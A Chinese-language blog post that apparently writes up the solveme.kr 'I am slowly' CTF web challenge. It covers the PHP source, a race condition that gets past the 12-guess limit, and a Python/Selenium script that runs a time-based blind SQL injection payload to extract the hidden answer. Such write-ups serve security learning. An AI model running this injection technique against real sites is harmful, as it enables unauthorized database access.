<!DOCTYPE html>
<html lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="myndtt">



<meta name="description" content="0x00.一波题目链接 http://iamslowly.thinkout.rf.gd 这是solveme.kr中最后一道题目,是一道web方面的题（本文没有图片，全是文字！） 12345678910111213141516171819202122232425&amp;lt;?php   // It&apos;s &apos;I am slowly&apos; problem of &apos;Solve Me&apos;.   error_report">
<meta name="keywords" content="记录,web,audit,sql">
<meta property="og:type" content="article">
<meta property="og:title" content="solveme.kr-iamsowly">
<meta property="og:url" content="https://myndtt.github.io/2017/11/14/iamsowly/index.html">
<meta property="og:site_name" content="myndtt || blog">
<meta property="og:description" content="0x00.一波题目链接 http://iamslowly.thinkout.rf.gd 这是solveme.kr中最后一道题目,是一道web方面的题（本文没有图片，全是文字！） 12345678910111213141516171819202122232425&amp;lt;?php   // It&apos;s &apos;I am slowly&apos; problem of &apos;Solve Me&apos;.   error_report">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://myndtt.github.io/images/35.png">
<meta property="og:updated_time" content="2019-09-22T05:04:46.311Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="solveme.kr-iamsowly">
<meta name="twitter:description" content="0x00.一波题目链接 http://iamslowly.thinkout.rf.gd 这是solveme.kr中最后一道题目,是一道web方面的题（本文没有图片，全是文字！） 12345678910111213141516171819202122232425&amp;lt;?php   // It&apos;s &apos;I am slowly&apos; problem of &apos;Solve Me&apos;.   error_report">
<meta name="twitter:image" content="http://myndtt.github.io/images/35.png">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="myndtt || blog" type="application/atom+xml">



    <link rel="shortcut icon" href="/images/1.jpg">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>solveme.kr-iamsowly | myndtt || blog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/images/1.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">myndtt</a></h1>
        </hgroup>

        
        <p class="header-subtitle">从天堂到彼界 路过人间</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:admin@myndtt.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="https://github.com/myndtt" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/audit/">audit</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/flask/">flask</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/game/">game</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/glance/">glance</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/keystone/">keystone</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/openstack/">openstack</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/scrapy/">scrapy</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sniperoj/">sniperoj</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql/">sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sqli/">sqli</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sqlid/">sqlid</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/学习/">学习</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/实验吧/">实验吧</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/点滴/">点滴</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/编程/">编程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/胡说八道/">胡说八道</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/记录/">记录</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/记录-hadoop/">记录 hadoop</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.sec-wiki.com/">sec-wiki</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.myh0st.cn/">myh0st</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.leavesongs.com/">大P神</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.laruence.com/">风神(风雪之隅)</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.yulegeyu.com/">雨师傅</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://momomoxiaoxi.com/">小西师傅</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://lorexxar.cn/">LoRexxar</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.yqxiaojunjie.com/">乐清师傅</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://0x48.pw/">Hcamael</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://chybeta.github.io/">Chybeta</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/lcamry">lcamry</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.lynahex.com/">lynahex</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/iamstudy/">柠檬师傅</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">小菜鸡 奋斗中...</div>
                </section>
                
            </div>
        </div>
    </header>   
   	 <div id="circle"></div>
		<div id="circletext"><strong style="font-size: 12px;"><a>词不达意</a></strong></div>
		<div id="circle1"></div>             
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">myndtt</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/images/1.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">myndtt</a></h1>
            </hgroup>
            
            <p class="header-subtitle">从天堂到彼界 路过人间</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:admin@myndtt.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="https://github.com/myndtt" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-iamsowly" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2017/11/14/iamsowly/" class="article-date">
      <time datetime="2017-11-14T01:34:11.000Z" itemprop="datePublished">2017-11-14</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      solveme.kr-iamsowly
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/audit/">audit</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/sql/">sql</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/">web</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/记录/">记录</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="0x00-一波"><a href="#0x00-一波" class="headerlink" title="0x00.一波"></a>0x00.一波</h2><p>题目链接 <a href="http://iamslowly.thinkout.rf.gd" target="_blank" rel="noopener">http://iamslowly.thinkout.rf.gd</a></p>
<p>这是solveme.kr中最后一道题目,是一道web方面的题（本文没有图片，全是文字！）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   <span class="comment">// It's 'I am slowly' problem of 'Solve Me'.</span></span><br><span class="line">   error_reporting(<span class="number">0</span>);</span><br><span class="line">   <span class="keyword">require</span> <span class="keyword">__DIR__</span>.<span class="string">'/lib.php'</span>; </span><br><span class="line"></span><br><span class="line">   $table = <span class="string">'iamslowly_'</span>.ip2long($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">   $answer = $_GET[<span class="string">'answer'</span>];</span><br><span class="line"></span><br><span class="line">   <span class="keyword">if</span>(<span class="keyword">isset</span>($answer))&#123;</span><br><span class="line">       $con = mysqli_connect($sql_host, $sql_username, $sql_password, $sql_dbname)</span><br><span class="line">           <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">'SQL server down'</span>);</span><br><span class="line"></span><br><span class="line">       $result = mysqli_fetch_array(</span><br><span class="line">           mysqli_query($con, <span class="string">"SELECT `count` FROM `&#123;$table&#125;`;"</span>)</span><br><span class="line">       );</span><br><span class="line">       <span class="keyword">if</span>(!<span class="keyword">isset</span>($result))&#123;</span><br><span class="line">           mysqli_query($con, <span class="string">"CREATE TABLE IF NOT EXISTS `&#123;$table&#125;` (`answer` char(32) NOT NULL, `count` int(4) NOT NULL);"</span>);</span><br><span class="line">           $new_answer = md5(sha1(<span class="string">'iamslowly_'</span>.mt_rand().<span class="string">'_'</span>.mt_rand().<span class="string">'_'</span>.mt_rand()));</span><br><span class="line">           mysqli_query($con, <span class="string">"INSERT INTO `&#123;$table&#125;` (`answer`,`count`) VALUES ('&#123;$new_answer&#125;',1);"</span>);</span><br><span class="line"></span><br><span class="line">       &#125;<span class="keyword">elseif</span>($result[<span class="string">'count'</span>] === <span class="string">'12'</span>)&#123;</span><br><span class="line">           mysqli_query($con, <span class="string">"DROP TABLE `&#123;$table&#125;`;"</span>);</span><br><span class="line">           <span class="keyword">echo</span> <span class="string">'Game over'</span>;</span><br><span class="line">           <span class="keyword">goto</span> quit;</span><br><span class="line">       &#125;</span><br></pre></td></tr></table></figure>

<a id="more"></a>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">       $randtime = mt_rand(<span class="number">1</span>, <span class="number">10</span>);</span><br><span class="line">        $result = mysqli_fetch_array(</span><br><span class="line">            mysqli_query($con, <span class="string">"SELECT * FROM `&#123;$table&#125;` WHERE sleep(&#123;$randtime&#125;) OR `answer`='&#123;$answer&#125;';"</span>)</span><br><span class="line">        );</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>($result) &amp;&amp; $result[<span class="string">'answer'</span>] === $answer)&#123;</span><br><span class="line">            mysqli_query($con, <span class="string">"DROP TABLE `&#123;$table&#125;`;"</span>);</span><br><span class="line">            <span class="keyword">echo</span> $flag;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            mysqli_query($con, <span class="string">"UPDATE `&#123;$table&#125;` SET `count`=`count`+1;"</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">'Go fast'</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">quit:</span><br><span class="line">        mysqli_close($con);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;hr&gt;'</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<p>代码逻辑很清楚，首先根据访问者的IP来创建一个表，然后在这个表的answer字段插入一个夹含着随机数并且进行两次哈希的摘要，并且表中有一个count字段，再然后需要我们去猜这个answer字段中的摘要，每错一次count值加1，当count等于12，这个表删除，下次访问将会重新建立起表并且设置新的answer。</p>
<h2 id="0x01-三折"><a href="#0x01-三折" class="headerlink" title="0x01.三折"></a>0x01.三折</h2><h3 id="1-update"><a href="#1-update" class="headerlink" title="1.update"></a>1.update</h3><p>因为answer我们完全可控，所以是否可以再下列语句中，构造合适的answer来更新或者更改表中的answer，这样下次就一定可以猜到了,然而翻遍了mysql语句大全并没有这类的语法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;SELECT * FROM `&#123;$table&#125;` WHERE sleep(&#123;$randtime&#125;) OR `answer`=&apos;&#123;$answer&#125;&apos;;&quot;</span><br></pre></td></tr></table></figure>

<h3 id="2-mt-rand"><a href="#2-mt-rand" class="headerlink" title="2.mt_rand"></a>2.mt_rand</h3><p>这个伪随机有什么地方可以突破呢，然而并没有，每次猜错了，下次访问时，php重新运行，种子重置。</p>
<h3 id="3-DNS解析"><a href="#3-DNS解析" class="headerlink" title="3.DNS解析"></a>3.DNS解析</h3><p>抱歉，试了，没有用。(也许可能跟平台有关系)</p>
<h2 id="0x02-从前从前"><a href="#0x02-从前从前" class="headerlink" title="0x02.从前从前"></a>0x02.从前从前</h2><p>重新回到代码，看看有什么可以突破的地方。聚焦在count===12，当count等于12时，才删掉表，如果我们可以绕过这个12，是不是就可以猜很多次，然后用时间盲注来获取我们想要的东西呢！那么如何突破这个12成为关键。</p>
<p><span style="color: #339966;">回到代码逻辑，猜一个answser，先判断count是否为12，然后在判断answer是否对，不对，count加1，如果当count等于11，我们去猜一个answer，然后在它进行判断answer是否对的时候，再进行一个访问猜一个answer，这样两次访问过后count会变成13，从而绕过count===12,接下来可以随便猜！等于说count=11,执行一条sleep很久的语句，同时过一会执行一条sleep很短的语句，后者执行完count加1，然后前者睡完后，count加1，这时候count等于13了，就是如此！（mysql sleep时间累加的，返回值为0）</span></p>
<h2 id="0x03-故事的最后"><a href="#0x03-故事的最后" class="headerlink" title="0x03.故事的最后"></a>0x03.故事的最后</h2><p>附上脚本 没有用到的可以删掉哈…</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf8 -*-</span></span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">import</span> urllib2</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">from</span> selenium <span class="keyword">import</span> webdriver</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">string = <span class="string">"1234567890abcdef"</span></span><br><span class="line">ul=<span class="string">"http://iamslowly.thinkout.rf.gd/index.php?answer="</span></span><br><span class="line">reload(sys)</span><br><span class="line">sys.setdefaultencoding(<span class="string">"utf-8"</span>)</span><br><span class="line">path=<span class="string">"C:\\Program Files (x86)\\Google\\Chrome\\chromedriver_win32\\chromedriver.exe"</span></span><br><span class="line">driver = webdriver.Chrome(path)</span><br><span class="line"><span class="comment">#ul="http://127.0.0.1/test1.php?answer=1"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">doinject</span><span class="params">(payload)</span>:</span></span><br><span class="line">    url=ul+payload</span><br><span class="line">    <span class="keyword">print</span> url</span><br><span class="line">    start_time=time.time()</span><br><span class="line">    user_agent = <span class="string">'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'</span></span><br><span class="line">    info = &#123; <span class="string">'User-Agent'</span> : user_agent,</span><br><span class="line">             <span class="string">'Host'</span> : <span class="string">'iamslowly.thinkout.rf.gd'</span>,</span><br><span class="line">             <span class="string">'Cookies'</span> : <span class="string">'__test=dad1d895748e3a49d9d9e72c4c160171'</span></span><br><span class="line">             &#125;</span><br><span class="line">    start_time=time.time()</span><br><span class="line">    driver.get(url)</span><br><span class="line">    <span class="comment">#the_page=driver.page_source.encode('utf-8')</span></span><br><span class="line">    <span class="comment">#the_page = response.read()</span></span><br><span class="line">    times = time.time() - start_time</span><br><span class="line">    <span class="keyword">print</span>  times</span><br><span class="line">    <span class="keyword">if</span> times &gt; <span class="number">30</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">doinject1</span><span class="params">(payload)</span>:</span></span><br><span class="line">    url=ul+payload</span><br><span class="line">    <span class="keyword">print</span> url</span><br><span class="line">    user_agent = <span class="string">'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'</span></span><br><span class="line">    info = &#123; <span class="string">'User-Agent'</span> : user_agent,</span><br><span class="line">             <span class="string">'Host'</span>:<span class="string">'iamslowly.thinkout.rf.gd'</span>,</span><br><span class="line">             <span class="string">'Cookies'</span>:<span class="string">'__test=dad1d895748e3a49d9d9e72c4c160171'</span></span><br><span class="line">             &#125;</span><br><span class="line">    driver.get(url)</span><br><span class="line">    the_page=driver.page_source.encode(<span class="string">'utf-8'</span>)</span><br><span class="line">    <span class="keyword">print</span> the_page.find(<span class="string">"Game"</span>)</span><br><span class="line">    <span class="keyword">if</span> (the_page.find(<span class="string">"Game over"</span>)&gt;<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getdump5</span><span class="params">(a)</span>:</span></span><br><span class="line">	pw=<span class="string">''</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,a):</span><br><span class="line">		<span class="keyword">for</span> j <span class="keyword">in</span> string:</span><br><span class="line">			data = <span class="string">"' or 1=1 and @ans:=answer union select sleep(case when @ans like '&#123;&#125;&#123;&#125;%' then 30 else 0 END),2-- -"</span>.format(pw,j)</span><br><span class="line">			<span class="comment">#data = requests.utils.quote(data)</span></span><br><span class="line">			<span class="keyword">if</span> doinject(str(data)):</span><br><span class="line">				pw = pw + str(j)</span><br><span class="line">				<span class="keyword">print</span> <span class="string">"[!] found"</span>,pw</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">"[*]The answer is %s"</span> % pw</span><br><span class="line">	<span class="keyword">print</span> <span class="string">'[*] ok ! get it!'</span></span><br><span class="line"><span class="function"><span class="keyword">def</span>  <span class="title">test</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">for</span> x <span class="keyword">in</span> range(<span class="number">20</span>):</span><br><span class="line">		x=str(x)+<span class="string">"'-- -"</span></span><br><span class="line">		<span class="keyword">if</span> doinject1(str(x)):</span><br><span class="line">			<span class="keyword">pass</span></span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			<span class="keyword">print</span> <span class="string">"no"</span></span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">'gg'</span> </span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">'__main__'</span>:</span><br><span class="line">		a=<span class="number">32</span></span><br><span class="line">		getdump5(a)</span><br><span class="line">		<span class="comment">#test()</span></span><br></pre></td></tr></table></figure>

<p>（一般来说二分法快一些,只不过时间盲注不适合二分，至少这里是，为了准确性成功一次要等很长时间）</p>
<p>这个网站有一个aes.js保护，并且上诉那个办法奇怪的是 两次不同时间的sleep同时睡完 ，本地没有成功，原网站倒是可以使count大于13（这里有点问题，目前没明白）。最后靠自动化让浏览器去实现了，由于几次都跑错了，所以特意在成功的时候sleep久一点，😔😔………………时间长度额….希望有人改进一下,或者说有其他方法也不一定…</p>
<p><img src="http://myndtt.github.io/images/35.png" alt="img"></p>
<p>最后感谢李师兄和龙师兄的帮助^_^</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2017/11/14/iamsowly/">solveme.kr-iamsowly</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">myndtt</a></p>
        <p><span>发布时间:</span>2017-11-14, 09:34:11</p>
        <p><span>最后更新:</span>2019-09-22, 13:04:46</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/11/14/iamsowly/" title="solveme.kr-iamsowly">https://myndtt.github.io/2017/11/14/iamsowly/</a>
            <span class="copy-path" data-clipboard-text="原文: https://myndtt.github.io/2017/11/14/iamsowly/　　作者: myndtt" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2017/12/04/problem&solution/">
                    problem&amp;solution
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2017/11/09/一道anti sql/">
                    从一道anti sql题讲起
                </a>
            </div>
        
    </nav>

  
   <!-- 添加打赏功能 只在文章详情中显示-->
     
      
     
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-一波"><span class="toc-number">1.</span> <span class="toc-text">0x00.一波</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-三折"><span class="toc-number">2.</span> <span class="toc-text">0x01.三折</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-update"><span class="toc-number">2.1.</span> <span class="toc-text">1.update</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-mt-rand"><span class="toc-number">2.2.</span> <span class="toc-text">2.mt_rand</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-DNS解析"><span class="toc-number">2.3.</span> <span class="toc-text">3.DNS解析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-从前从前"><span class="toc-number">3.</span> <span class="toc-text">0x02.从前从前</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-故事的最后"><span class="toc-number">4.</span> <span class="toc-text">0x03.故事的最后</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"solveme.kr-iamsowly　| myndtt || blog　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    
        <section class="youyan" id="comments">
    <script>
        var loadComment = function(){
            var d = document, s = d.createElement('script');
            s.src = 'http://v2.uyan.cc/code/uyan.js?uid=2148375';
            (d.head || d.body).appendChild(s);
        }
    </script>
    
